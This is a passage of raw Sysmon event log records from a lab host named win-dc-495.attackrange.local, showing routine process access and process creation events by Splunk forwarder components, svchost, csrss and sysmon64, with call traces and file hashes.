Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.688{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.156{59A5CD1D-9328-6005-CD04-00000000A301}30884304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.016{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S